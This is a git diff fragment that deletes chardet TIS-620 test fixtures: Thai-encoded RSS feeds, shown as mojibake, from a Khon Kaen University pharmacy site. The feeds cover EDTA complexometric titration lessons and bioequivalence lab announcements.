¶יׂא»ֳױֲ÷א·ױֲ÷¡ׁ÷¡ֳׂ´׃ֳ§×ױַװµ¢ֽ§₪¹אֳׂ·טׂ¹₪װ´ַטֱׂױ₪ֱַׂ¨׃א»ח¹µיֽ§ֲָֽׁׂ¼יֽ׳ט¹ד¹¡ֳׂ×טֲַאֵֻ׳ֽ·׃¡ֳׂ§ׂ¹µטׂ§זדֻי׃אֳח¨ֳֻ׳ֽהֱט ב´§₪ֱַׂ₪װ´אֻח¹¢ֽ§·טׂ¹ - -2. ·טׂ¹אֻח¹₪ֱַׂ׃₪ׁ­¢ֽ§·״¡װט§ֳֽ÷µֳַֻׁ׳ֽהֱט װט§¢ֽ§ד´ ֳֻ׳ֽ ÷״₪₪ֵד´·ױט₪װ´ַטֱׂױ₪ֱַׂ¨׃א»ח¹¡ׁ÷·טׂ¹ֱׂ¡·ױט״´·ױט·׃¨׀דֻי·טׂ¹»ֳ׀¾₪ֱַׂ׃אֳח¨ד¹×ױַװµ ב´§אֻµ״¼ֵ - - - - -ב÷÷½ײ¡ֻׁ´׃ֳֻׁ÷¡ֵ״טֱ - -1. ¨§א¢ױֲ¹»¯װ¡װֳװֲׂ¢ֽ§¡ֳׂא¡װ´ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹בֵ׀₪טׂ₪§·ױט¢ֽ§ֱ´״ֵ -2. ¨׃¹ַ¹ֽװאֵח₪µֳֽ¹ֽװֳ׀·ױטֱֳׂׂ¶א¡װ´¾ׁ¹¸׀ג₪ַׂאֵ¹·ל¡ׁ÷הֽֽֽ¹¢ֽ§גֵֻ׀אֳױֲ¡ַטֽׂ׀הֳ -3. ¨§ֲ¡µֲַֽׁטׂ§ֵװב¡¹´ל·ױטֱױ₪ט¢ֽ§ֽװאֵח₪µֳֽ¹ֽװֳ׀א¾ױֲ§ 1 ₪טֱׂ 4 ×¹װ´ -4. ֳׂ»ֳ׀¡ֽ÷·ױטד×יא»ח¹₪ֱֽא¾ֵח¡«װ§אֽא¨¹µל×¹װ´ polydentate ligate ה´יב¡טֳׂ»ֳ׀¡ֽ÷×¹װ´ד´ -5. ¨§ֽטׂ¹×׳טֳֽׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹ Cu(NH3)Cl2 בֵ׀ Cu2Fe(CN)6 -6. ¨§ֲ¡µֲַֽׁטׂ§¡ֳׂה·א·ֳµב÷÷א¡װ´ֳׂא×װ§«יֽ¹×¹װ´·ױטד×י inorganic complexing agents -7. ¡ֳׂה·א·ֳµ·ױטד×יד¹¡ֳַׂװא₪ֳׂ׀ֻלֻׂ»ֳװֱׂ³ה´י´ױ¹ׁי¹ »¯װ¡װֳװֲׂ·ױטא¡װ´ֳ׀ַֻטׂ§הֽֽֽ¹¢ֽ§גֵֻ׀¡ׁ÷ֵװב¡¹´ל₪ֳַא¡װ´¢ײי¹ד¹ֽׁµֳׂטַ¹א·טׂהֳ -8. EDTA ֱױ×׳טֽאµחֱַטֽׂ׀הֳ -9. אֱ׳טֽׁ­ֵׁ¡ֹ³לֲטֽ¢ֽ§ EDTA ₪׳ֽ H4Y ד¹ֳֵׂ׀ֲֵׂ¢ֽ§ EDTA ₪ֱֳַױ»ױ×ױלד´ֲֽט÷יׂ§בֵ׀»ֳװֱׂ³¢ֽ§בµטֵ׀»ױ×ױלד¹ֳֵׂ׀ֲֵׂ¢ײי¹ֲֽט¡ׁ÷ֽ׀הֳ -10. װט§·ױטֱױ¼ֵµטֽא₪ֳֽל¿¢ֽ§¡ֳׂה·א·ֳµ₪׳ֽֽ׀הֳ÷יׂ§ ¨§ֽ¸װ÷ֲׂ¶ײ§ֽװ·¸װ¾ֵ¹ׁי¹ -11. ¨§ֲ¡µֲַֽׁטׂ§ֽװ¹´װא₪אµֳֽל·ױטד×יד¹¡ֳׂה·א·ֳµב÷÷א¡װ´ֳׂא×װ§«יֽ¹ֱׂ 2 ×¹װ´ -12. א·₪¹װ₪¢ֽ§¡ֳׂה·א·ֳµב÷÷א¡װ´ֳׂא×װ§«יֽ¹ֱױ¡ױטַװ¸ױ ֽ׀הֳ÷יׂ§ ¨§ֽ¸װ÷ֲֵֻׁׂ¡¡ֳׂ¢ֽ§בµטֵ׀ַװ¸ױ -13. ¡ֳׂ₪ַ÷₪״ֱדֻי¡ֳׂה·א·ֳµאֵ׳ֽ¡ה·א·ֳµא©¾ׂ׀הֽֽֽ¹·ױט¹ד¨·׃ה´יֲֽטׂ§הֳ÷יׂ§ ¨§ֽ¸װ÷ֲׂ - - - - - -Link ·ױט¹טׂ¹ד¨ -http://61.19.145.7/student/science401/chem/chem3/complex.html -http://chimge.unil.ch/En/complexes/1cpx0.htm - - - - - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=198 - - - 7. ¡ֳׂהµא·ֳµֻׂ»ֳװֱׂ³הֽֽֽ¹¢ֽ§גֵֻ׀ד¹ֳֵׂ׀ֲֵׂ¼ֱ - http://pharmacy.kku.ac.th/analyse1/index.php?p=196 - http://pharmacy.kku.ac.th/analyse1/index.php?p=196#comments - Tue, 23 Nov 2004 07:06:51 +0000 - - 7. ¡ֳׂה·א·ֳµֻׂ»ֳװֱׂ³הֽֽֽ¹¢ֽ§גֵֻ׀ד¹ֳֵׂ׀ֲֵׂ¼ֱ http://pharmacy.kku.ac.th/analyse1/index.php?p=196 - א¹׳טֽ§¨ׂ¡ EDTA ֱֳׂׂ¶·׃»¯װ¡װֳװֲׂ¡ׁ÷גֵֻ׀ה´יֲֵֻׂ×¹װ´ ·ׁי§·ױטא»ח¹ divalent, trivalent בֵ׀ tetravalent ´ׁ§¹ׁי¹ד¹אְׁ×ְׁ³±ל·ױטֱױגֵֻ׀ֲֵֻׂ×¹װ´¼ֱ¡ׁ¹ֲֽט ¡חµיֽ§ֱױַװ¸ױאֵ׳ֽ¡ titrate א©¾ׂ׀גֵֻ׀÷ׂ§×¹װ´·ױטµיֽ§¡ֳׂ ג´ֲ·ױטהֱט·׃»¯װ¡װֳװֲׂ¡ׁ÷הֽֽֽ¹¢ֽ§גֵֻ׀ֽ׳ט¹·ױט¼ֱֲֽט ַװ¸ױ¡ֳַׂװא₪ֳׂ׀ֻל·׃ה´יֲֵַֻׂװ¸ױ´ׁ§¹ױי - 1. »ֳׁ÷ pH ¢ֽ§ֳֵׂ׀ֲֵׂ ַװ¸ױ¹ױי¨׀ד×יµטֽאֱ׳טֽגֵֻ׀·ױט¼ֱֲֽט¹ׁי¹¨׀א¡װ´ complex ¡ׁ÷ EDTA ה´יד¹ pH ·ױטבµ¡µטׂ§¡ׁ¹א×ט¹ גֵֻ׀ד¹¡ֵ״טֱ alkali earth metals ¨׀א¡װ´ complex ·ױט₪§µַׁ¡ׁ÷ EDTA ·ױט pH>7 בµטגֵֻ׀¾ַ¡ transition elements ¨׀א¡װ´ ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=196 - - - 6. Classification of EDTA Titration - http://pharmacy.kku.ac.th/analyse1/index.php?p=195 - http://pharmacy.kku.ac.th/analyse1/index.php?p=195#comments - Tue, 23 Nov 2004 06:56:46 +0000 - - 6. Classification of EDTA Titration http://pharmacy.kku.ac.th/analyse1/index.php?p=195 - ¡ֳׂה·א·ֳµֻׂ»ֳװֱׂ³הֽֽֽ¹¢ֽ§גֵֻ׀´יֲַ EDTA ֱױַװ¸ױ¡ֳׂה·א·ֳµה´יֲֵֻׂב÷÷·ױט׃₪ׁ­ֱױ 5 ב÷÷₪׳ֽ - -1. Direct Titration - -א»ח¹¡ֳׂה·א·ֳµג´ֲµֳ§ א¾׳טֻֽׂ»ֳװֱׂ³גֵֻ׀·ױטµיֽ§¡ֳׂג´ֲµֳ§´יֲֳֵַׂ׀ֱֲֵׂׂµֳ°ׂ¹ EDTA ד¹ֳֵׂ׀ֲֵׂ÷ׁ¿א¿ֳֽל·ױט₪ַ÷₪״ֱ pH הַי·ױט₪טׂ·ױטµיֽ§¡ֳׂ בֵ׀ד×י metal indicator ·ױטאֱֻׂ׀ֱד¹¡ֳׂµׁ´װ¹¨״´ֲ״µװ µֲַֽׁטׂ§א×ט¹ ¡ֳׂ titrate ֻׂ»ֳװֱׂ³ Mg2+ ´יֲַ EDTA ג´ֲד×י eriochrome black T א»ח¹ֽװ¹´װא₪אµֳֽל בֵ׀»ֳׁ÷ pH 10 ´יֲֳֵַׂ׀ֲֵׂ÷ׁ¿א¿ֳֽלֳ׀÷÷ ammonia-ammonium chloride buffer - -2. Back Titration - -א»ח¹¡ֳׂה·א·ֳµֲיֽ¹¡ֵׁ÷ ג´ֲ¡ֳׂאµװֱֳֵׂ׀ֱֲֵׂׂµֳ°ׂ¹ EDTA ·ױטֱׂ¡א¡װ¹¾ֽ¨ׂ¡÷װַאֳµ ֳֻ׳ֽ»װא»µ ֵ§ד¹ֳׂµֲַֽׁטׂ§¢ֽ§הֽֽֽ¹¢ֽ§גֵֻ׀ ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=195 - - - 5. Method of End point Detection is Complexometric Titration - http://pharmacy.kku.ac.th/analyse1/index.php?p=194 - http://pharmacy.kku.ac.th/analyse1/index.php?p=194#comments - Tue, 23 Nov 2004 06:29:26 +0000 - - 5. Method of End Point Detection is Complexometric Titr http://pharmacy.kku.ac.th/analyse1/index.php?p=194 - 1. Visual method -ד×יַװ¸ױ´¡ֳׂא»ֵױטֲ¹ב»ֵ§ױ¢ֽ§ indicator ·ױט¨״´ֱֱֲֵל ג´ֲ indicator ·ױטד×יֱױ 2 ×¹װ´₪׳ֽ -1.1 PM indicator ֳֻ׳ֽ metal indicator ֳֻ׳ֽ metallochromic indicator ֱׁ¡א»ח¹ organic -compound ·ױטאֳױֲ¡ַטׂ dye dye ¹ױי¨׀·׃ֻ¹יׂ·ױטא»ח¹ chelating agent א¾׳טֽ form א»ח¹ dye-mtal complex ·ױטדֻיױבµ¡µטׂ§¨ׂ¡ free dye בֵ׀¨׀ֱױ stability constant µט׃¡ַטׂ ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=194 - - - 4. Factor ·ױטֱױ¼ֵµטֽ Stability ¢ֽ§ Metal-EDTA Complex - http://pharmacy.kku.ac.th/analyse1/index.php?p=193 - http://pharmacy.kku.ac.th/analyse1/index.php?p=193#comments - Fri, 19 Nov 2004 03:12:30 +0000 - - 4. Factor ·ױטֱױ¼ֵµטֽ Stability ¢ֽ§ Metal-EDTA Compl http://pharmacy.kku.ac.th/analyse1/index.php?p=193 - 4. Factor ·ױטֱױ¼ֵµטֽ Stability ¢ֽ§ Metal-EDTA Complex -1. Effect ¢ֽ§ pH µטֽ¡ֳׂא¡װ´ complex -אֱ׳טֽ [Y] ֱׂ¡₪טׂ K ¨׀¹יֲֽ ´ׁ§¹ׁי¹»¯װ¡װֳװֲׂ form complex ¹ױי ¨׀א¡װ´´ױ·ױט״´ד¹´טׂ§ בµט÷ׂ§₪ֳׁי§¶יׂא»ח¹´טׂ§ֱׂ¡א¡װ¹ה» ¡חֽׂ¨א¡װ´ metallic hydroxide בֵ׀ metallic hydroxide ¹ױי ֱׁ¡¨׀ֱױ₪טׂ solubility product µט׃ ֵ׀ֲֵׂ¹י׃ה´י¹יֲֽ ¡חֽׂ¨µ¡א»ח¹µ׀¡ֽ¹ֵ§ֱׂה´י בµט¶יׂ pH µט׃א¡װ¹ה» »ֳװֱׂ³ Y4- ¡חֵ´ֵ§´יֲַ ט§¼ֵµטֽ₪טׂ solubility דֻיµט׃ֵ§ -₪טׂ stability constant ¢ֽ§ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹ֻׂה´י¨ׂ¡ֱ¡ֳׂ¹ױי - M ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=193 - - - 3. Titration of complex formation - http://pharmacy.kku.ac.th/analyse1/index.php?p=192 - http://pharmacy.kku.ac.th/analyse1/index.php?p=192#comments - Fri, 19 Nov 2004 02:37:24 +0000 - - 3. Titration of complex formation http://pharmacy.kku.ac.th/analyse1/index.php?p=192 - ¡ֳׂה·א·ֳµ׃ֳֻׁ÷»¯װ¡װֳװֲׂ¡ֳׂא¡װ´ֳׂא×װ§«יֽ¹ (Complexometric titration ) -ֵֻׁ¡¡ֳׂ¢ֽ§ complexometric titrationא»ח¹¡ֳׂהµאµֳ·א¾׳טֻֽׂ»ֳװֱׂ³ metal ion ג´ֲ¡ֳׂא¡װ´א»ח¹ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹ֳ׀ַֻטׂ§הֽֽֽ¹¢ֽ§גֵֻ׀ «ײט§א»ח¹µֳַׁׁ÷ֽװאֵ₪µֳֽ¹¡ׁ÷ֳׂ·ױטֱֳׂׂ¶דֻי₪טֽװאֵ₪µֳֽ¹¡ׁ÷גֵֻ׀ה´י ד¹ֳֵׂ׀ֲֵׂ·ױט¶¡ buffered דֻיֱױ pH ֲֽטד¹×טַ§·ױטאֱֻׂ׀ֱ ֽװ¹´װא₪אµֳֽל·ױטד×י¨׀¶¡אµװֱֵ§ה»ד¹ֳֵׂ׀ֲֵׂ¹ױי בֵיַהֽֽֽ¹¢ֽ§גֵֻ׀¨׀¶¡הµאµֳ·´יֲֳֵַׂ׀ֱֲֵׂׂµֳ°ׂ¹¢ֽ§ complexing agent בֵ׀אֱ׳טֽ¶ײ§¨״´ֲ״µװ₪ֳַׁ§א¡µאֻח¹¡ֳׂא»ֵױטֲ¹ב»ֵ§ױה´י×ׁ´א¨¹ ¡ֳׂµֳַ¨ַׁ´¨״´ֲ״µװֽׂ¨·׃ה´י·ׁי§ physical method בֵ׀ chemical method ¡ֳׂהµאµֳ·ג´ֲַװ¸ױ¹ױי¨׀·׃ה´י§טֲׂ ׀´ַ¡בֵ׀ֱױ₪ֱַׂ¶¡µיֽ§ ´ׁ§¹ׁי¹¨ײ§ה´יֱױ¡ֳׂ¾ׁ²¹ֱׂׂד×יב·¹¡ֳַׂװא₪ֳׂ׀ֻלג´ֲ gravimetric method «ײט§ַװא₪ֳׂ׀ֻלהֽֽֽ¹גֵֻ׀ה´יֲֵֻׂ×¹װ´ - ¡ֳׂ¨׀אֵ׳ֽ¡ד×י complexometric titration method ד¹¡ֳַׂװא₪ֳׂ׀ֻלֻׂ»ֳװֱׂ³גֵֻ׀×¹װ´µטׂ§ ז ה´י¹ׁי¹µיֽ§¾װ¨ֳׂ³ׂ¶ײ§ֵֻׁ¡א¡³±ל´ׁ§¹ױי -1. Complex reaction µיֽ§א»ח¹ stoichiometrically ¡ֵטַׂ₪׳ֽ metal ion µיֽ§·׃»¯װ¡װֳװֲׂ¡ׁ÷ ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=192 - - - 2. Metal complex formation - http://pharmacy.kku.ac.th/analyse1/index.php?p=5 - http://pharmacy.kku.ac.th/analyse1/index.php?p=5#comments - Thu, 18 Nov 2004 09:12:06 +0000 - - 2. Metal Complex formation http://pharmacy.kku.ac.th/analyse1/index.php?p=5 - ֳׂא×װ§«יֽ¹·ױטא¡װ´¢ײי¹ֳ׀ַֻטׂ§הֽֽֽ¹¢ֽ§גֵֻ׀¡ׁ÷ֵװב¡¹´ל(ligand) ֳֻ׳ֽ ₪ֱֽא¾ֵח¡«װ§אֽ-א¨¹µל (complexing agent) ֱֳׂׂ¶ֽ¸װ÷ֲׂה´יג´ֲ·ִֹ®ױ¢ֽ§ Lewis acid base הֽֽֽ¹¢ֽ§גֵֻ׀א»ח¹µ׃ֳׁ÷₪ט¢ֽ§ֽװאֵח¡µֳֽ¹ (electron pair acceptor) ¨ׂ¡ֵװב¡¹´ל - - - -₪׃¹װֱֲׂµטׂ§ז·ױטא¡ױטֲַ¢יֽ§ -Complexation -µֱׂ₪׃¨׃¡ׁ´₪ֱַׂ¢ֽ§ Lewis א»ח¹»®װ¡װֳװֲׂ¢ֽ§¡ֳ´בֵ׀´טׂ§·ױטא¡װ´¨ׂ¡גֵֻ׀«ײט§א»ח¹ Lewis acid ֳֻ׳ֽµֳַׁׁ÷ֽװאֵח₪µֳֽ¹¡ׁ÷ ligand «ײט§א»ח¹ Lewis base ֳֻ׳ֽµַׁדֻיאֵח₪µֳֽ¹ד¹¡ֳׂא¡װ´¾ׁ¹¸׀¡ׁ÷גֵֻ׀ -Complex ion ֳֻ׳ֽ coordination compound -א»ח¹ֳׂ»ֳ׀¡ֽ÷ neutral ֳֻ׳ֽ ionic compound ·ױטא¡װ´¨ׂ¡¡ֳֳׂיׂ§¾ׁ¹¸׀ coordinate covalent bond ֳ׀ַֻטׂ§ metal ion ¡ׁ÷ complexing agent ֳׂ»ֳ׀¡ֽ÷א×װ§«יֽ¹·ױטא¡װ´¢ײי¹טַ¹דֻ­ט¨ײ§ֱױױ ¨ײ§ד×יד¹¡ֳַׂװא₪ֳׂ׀ֻל·ױטא»ח¹ colorimetric בֵ׀ photometric method -Coordinate covalent ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=5 - - - 1. Introduction - http://pharmacy.kku.ac.th/analyse1/index.php?p=3 - http://pharmacy.kku.ac.th/analyse1/index.php?p=3#comments - Wed, 17 Nov 2004 09:41:14 +0000 - - 1. Introduction http://pharmacy.kku.ac.th/analyse1/index.php?p=3 - ¡ֳַׂװא₪ֳׂ׀ֻלֻׂ»ֳװֱׂ³ inorganic substance ד¹ pharmaceutical product א×ט¹ ¾ַ¡גֵֻ׀: Al3+, Ca2+, Mg2+, Zn2+ בֵ׀ Bi3+ אֵֻטׂ¹ױי ֱֳׂׂ¶ַװא₪ֳׂ׀ֻלה´יֲֵַֻׂװ¸ױ ´ׁ§¹ױי - -1. Classical Method -א»ח¹¡ֳַׂװא₪ֳׂ׀ֻלג´ֲֲָֽׁׂ¡ֳׂא¡װ´»¯װ¡װֳװֲׂא₪ֱױ ב÷ט§ֲטֲֽה´י´ׁ§¹ױי -1.1 Gravimetric method -א»ח¹ַװ¸ױ¡ֳֻׂׂ»ֳװֱׂ³גֵֻ׀ ג´ֲ¡ֳׂµ¡µ׀¡ֽ¹ (precipitation) הֽֽֽ¹גֵֻ׀·ױטµיֽ§¡ֳַׂװא₪ֳׂ׀ֻל¡ׁ÷ reagent ·ױטאֱֻׂ׀ֱ אֱ׳טֽה´יµ׀¡ֽ¹בֵיַ ·׃¡ֳׂ¡ֳֽ§ (filtration) ֵיׂ§µ׀¡ֽ¹ (washing) ֽ÷µ׀¡ֽ¹דֻיבֻי§ (drying) בֵ׀א¼ׂµ׀¡ֽ¹¨¹ה´י¹י׃ֻ¹ׁ¡₪§·ױט (ignition) ַװ¸ױַװא₪ֳׂ׀ֻלב÷÷¹ױי µיֽ§ד×יאֵַׂד¹¡ֳַׂװא₪ֳׂ׀ֻלֱׂ¡ בµטֵ׀¢ׁי¹µֽ¹·׃ה´יֲ״ט§ֲׂ¡ ¨ײ§הֱטא»ח¹·ױט¹װֱֲ - -1.2 Volumetric method -ַװ¸ױ¹ױיֱֳׂׂ¶ַװא₪ֳׂ׀ֻל»ֳװֱׂ³ metal ion ה´י§טֲׂבֵ׀ֳַ´אֳחַ¢ײי¹ ג´ֲדֻי metal ion ·׃»¯װ¡װֳװֲׂ¡ׁ÷גֱאֵ¡״ֵ·ױטֱֳׂׂ¶דֻיֽװאֵ₪µֳֽ¹¡ׁ÷ metal ion ה´י ... - http://pharmacy.kku.ac.th/analyse1/wp-commentsrss2.php?p=3 - - - diff --git a/chardet/tests/TIS-620/pharmacy.kku.ac.th.centerlab.xml b/chardet/tests/TIS-620/pharmacy.kku.ac.th.centerlab.xml deleted file mode 100644 index df84e9f..0000000 --- a/chardet/tests/TIS-620/pharmacy.kku.ac.th.centerlab.xml +++ /dev/null @@ -1,207 +0,0 @@ - - - - - - - §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ - http://pharmacy.kku.ac.th/centerlab - babblings! - Copyright 2005 - Tue, 30 Aug 2005 09:46:58 +0000 - http://wordpress.org/?v=1.2 - - - ֵֻׁ¡¡ֳׂבֵ׀¢ׁי¹µֽ¹¡ֳָׂײ¡ֹׂ×ױֱֱֵַ¢ֽ§ֲׂ - http://pharmacy.kku.ac.th/centerlab/index.php?p=28 - http://pharmacy.kku.ac.th/centerlab/index.php?p=28#comments - Tue, 30 Aug 2005 09:05:36 +0000 - - ¡ֳָׂײ¡ֹׂ×ױֱֱֵַ¢ֽ§ֲׂ×׳טֱֽׁׂ­ http://pharmacy.kku.ac.th/centerlab/index.php?p=28 - ֵֻׁ¡א¡³±לבֵ׀ב¹ַ»¯װ÷ׁµװד¹¡ֳָׂײ¡ֹׂ×ױֱֱֵַ¢ֽ§ֱֲׁׂׂ­ -1. ֵֻׁ¡¡ֳׂבֵ׀אֻµ״¼ֵ -ֲׂ·ױטֱױµֲַׁׂ׃₪ׁ­ ¢¹ׂ´ בֵ׀ ֳ»ב÷÷אֱֻ׳ֽ¹¡ׁ¹ בµט¼ֵװµ´יֲַ¡ֱֳֳַװ¸ױ בֵ׀ ¼י¼ֵװµµטׂ§¡ׁ¹ ¨׀µיֽ§¾װ¨¹לַטׂדֻי¼ֵ¡ֳֳׁׂ¡ֹׂא·טׂא·ױֱֲ¡ׁ¹ (therapeutic equivalence) ¨ײ§¨׀ֱֳׂׂ¶ד×יב·¹¡ׁ¹ה´י ַװ¸ױ·ױטה´יֳׁ÷¡ֱֲֳֳֽׁׂ÷ ַטֱֳׂׂׂ¶ב´§¶ײ§₪ֱַׂא·טׂא·ױֱֲ¡ׁ¹¢ֽ§¼ֵװµְׁ³±לה´י ֱױ 4 ַװ¸ױ ´ׁ§¹ױי -1.ַװ¸ױא»ֳױֲ÷א·ױֲ÷¡ֳָׂײ¡ֹׂ×ױֱֱֵַד¹ֱ¹״ֲֹל (in vivo bioequivalence) -2.ַװ¸ױא»ֳױֲ÷א·ױֲ÷¡ֳָׂײ¡ֹׂ·ׂ§אְׁ×¾ֵָׂµֳלד¹ֱ¹״ֲֹל (pharmacodynamic studies) -1.3 ַװ¸ױא»ֳױֲ÷א·ױֲ÷¼ֵ¡ֳֳׁׂ¡ֹׂ·ׂ§₪ֵװ¹װ¡ (comparative clinical studies) -1.4 ַװ¸ױא»ֳױֲ÷א·ױֲ÷¼ֵ¡ֳָׂײ¡ֹׂ¡ֳֵׂ׀ֲֵׂ/»ֵ´»ֵטֲֽµֲַׁׂד¹ֵֻֽ´·´ֵֽ§( in vitro -dissolution / release profiles) -´ׁ§¹ׁי¹א¾׳טֽא»ח¹ֵֻׁ¡»ֳ׀¡ׁ¹ד¹»ֳ׀װ·¸װ¼ֵ¢ֽ§ֱֲׁׂׂ­ ׃¹ׁ¡§ׂ¹₪³׀¡ֱֳֳ¡ֳֳֻֽׂׂׂבֵ׀ֲׂ ¨ײ§ה´י¡׃ֻ¹´ֵֻׁ¡א¡³±ל בֵ׀ב¹ַ»¯װ÷ׁµװ¹ױי¢ײי¹ א¾׳טֽד×י»ֳ׀¡ֽ÷¡ֳׂ¾װ¨ֳׂ³ׂ₪ֱַׂא·טׂא·ױֱֲ¡ׁ¹·ׂ§»ֳ׀װ·¸װ¼ֵ¡ֳֳׁׂ¡ֹׂ¢ֽ§ֱֲׁׂׂ­ד¹»ֳ׀א·ָה·ֲ -2.ַׁµ¶״»ֳ׀§₪ל -1.א¾׳טֽ¡׃ֻ¹´א¡³±ל¾װ¨ֳׂ³ֱֲׁׂׂׂ­·ױט¢ֽ¢ײי¹·׀א÷ױֲ¹µ׃ֳׁ÷ֲַׂטׂ ×¹װ´ד´µיֽ§ֲ׳ט¹¼ֵ¡ֳׂ -ָײ¡ֹׂ×ױֱֱֵַד¹ֱ¹״ֲֹל בֵ׀ / ֳֻ׳ֽ ¡ֳָׂײ¡ֹׂ¡ֳֵׂ׀ֲֵׂ/»ֵ´»ֵטֲֽµֲַׁׂד¹ֵֻֽ´ ... - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=28 - - - א»װ´÷ֳװ¡ֳׂ¡ֳָׂײ¡ֹׂ´יׂ¹ Pharmaceutical equivalence - http://pharmacy.kku.ac.th/centerlab/index.php?p=27 - http://pharmacy.kku.ac.th/centerlab/index.php?p=27#comments - Wed, 06 Jul 2005 02:45:00 +0000 - - ¢טַׂ»ֳ׀×ֱׁׂ¾ׁ¹¸ל http://pharmacy.kku.ac.th/centerlab/index.php?p=27 - NEW - - §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ - ה´יא»װ´דֻי÷ֳװ¡ֳׂ¡ֳָׂײ¡ֹׂ´יׂ¹Pharmaceutical equivalence ֳֻ׳ֽ¡ֳָׂײ¡ֹׂ₪ֱֱֱֵַׂ¡ׁ¹·ׂ§אְׁ×ָׂµֳל ¢ֽ§ֲׂ - - ... - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=27 - - - ¡ֳֽׂ÷ֱֳא₪ֳ׳טֽ§ֱ׳ֽ - http://pharmacy.kku.ac.th/centerlab/index.php?p=26 - http://pharmacy.kku.ac.th/centerlab/index.php?p=26#comments - Wed, 01 Jun 2005 09:25:21 +0000 - - ¢טַׂ»ֳ׀×ֱׁׂ¾ׁ¹¸ל http://pharmacy.kku.ac.th/centerlab/index.php?p=26 - ¢טַׂ»ֳ׀×ֱׁׂ¾ׁ¹¸ל - -§ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ¨׀¨ׁ´¡ֳֽׂ÷ֱֳ¡ֳׂד×יא₪ֳ׳טֽ§ֱ׳ַֽװ·ֲָׂׂµֳל¢ײי¹ -ד¹ ַׁ¹·ױט 6 ֱװ¶״¹ֲׂ¹ 2548 ¨ײ§¢ֽא×װ­¹ׁ¡ָײ¡ֹׂ×ׁי¹»ױ·ױט 5 בֵ׀·טׂ¹¼י¹ד¨ ֱֳׂׂ¶ב¨י§₪ֱַׂ»ֳ׀§₪לא¢יֳׁׂ÷¡ֳֽׂ÷ֱֳ´ׁ§¡ֵטַׂה´י·ױט - §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ ₪³׀אְׁ×ָׂµֳל ֱ.¢ֽ¹ב¡ט¹ ה´י´יֲַµ¹אֽ§ֳֻ׳ֽ·ׂ§ֱֲֻׂאֵ¢ְֲׂד¹ 440 בֵ׀461 ְֲׂד¹ַׁ¹·ױט 3 ֱװ¶״¹ֲׂ¹ 2548 - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=26 - - - §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ - http://pharmacy.kku.ac.th/centerlab/index.php?p=25 - http://pharmacy.kku.ac.th/centerlab/index.php?p=25#comments - Tue, 01 Feb 2005 09:24:22 +0000 - - §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ http://pharmacy.kku.ac.th/centerlab/index.php?p=25 - - - - אµחֱד¨דֻי÷ֳװ¡ֳׂ ₪׳ֽ§ׂ¹¢ֽ§אֳׂ - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=25 - - - ¢טַׂ»ֳ׀×ֱׁׂ¾ׁ¹¸ל - http://pharmacy.kku.ac.th/centerlab/index.php?p=24 - http://pharmacy.kku.ac.th/centerlab/index.php?p=24#comments - Fri, 28 Jan 2005 08:19:37 +0000 - - ¢טַׂ»ֳ׀×ֱׁׂ¾ׁ¹¸ל http://pharmacy.kku.ac.th/centerlab/index.php?p=24 - * ¡ֳׂ÷ֲֲֳֳׂ¾װאָֹאֳ׳טֽ§ Fundamental of Dissolution Testing - ג´ֲ Prof.Dr.Umesh Banakar - ד¹ַׁ¹ָ״¡ֳל·ױט 4 ¡״ְֱׂ¾ׁ¹¸ל 2548 ³ ֻיֽ§¨װ³ַװְׂ אֵַׂ 09.00-15.00 ¹. - ֽ÷¶ֱֲֳֵׂׂ׀אֽױֲ´בֵ׀ב¨י§ֲֳׂ×׳טֽא¢יֳׁׂ÷¿ׁ§ה´י·ױט - ¹ֲׂ¸ׂ¹ױ א·ָָװֳװ §ׂ¹÷ֳװ¡ֳׂ·ׂ§ַװ×ׂ¡ֳׂבֵ׀ַװ¨ֲׁ א÷ֳֽלְֲׂד¹ 460, 2589 - 0-4334-8354 - -ַװ¸ױַװא₪ֳׂ׀ֻלֲׂ - - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=24 - - - ֳ׀א÷ױֲ÷¡ֳׂד×יֻיֽ§»¯װ÷ׁµװ¡ֳׂ¡ֵׂ§ - http://pharmacy.kku.ac.th/centerlab/index.php?p=21 - http://pharmacy.kku.ac.th/centerlab/index.php?p=21#comments - Fri, 28 Jan 2005 03:44:39 +0000 - - ֳ׀א÷ױֲ÷¡ֳׂד×יֻיֽ§ http://pharmacy.kku.ac.th/centerlab/index.php?p=21 - ב÷÷¿ֳֽלֱ - -- ב÷÷¿ֳֽלֱ¡ֳׂ¢ֽד×יֻיֽ§»¯װ÷ׁµװ¡ֳׂ¡ֵׂ§ - --₪טׂ÷ֳװ¡ֳׂ - - - - http://pharmacy.kku.ac.th/centerlab/wp-commentsrss2.php?p=21 - - - »ֳ׀ַׁµװ ַװֲׁ·ָׁ¹ל ¾ׁ¹¸¡װ¨ - http://pharmacy.kku.ac.th/centerlab/index.php?p=2 - http://pharmacy.kku.ac.th/centerlab/index.php?p=2#comments - Mon, 24 Jan 2005 08:02:33 +0000 - - ประวัติ http://pharmacy.kku.ac.th/centerlab/index.php?p=2 - »ֳ׀ַׁµװ - 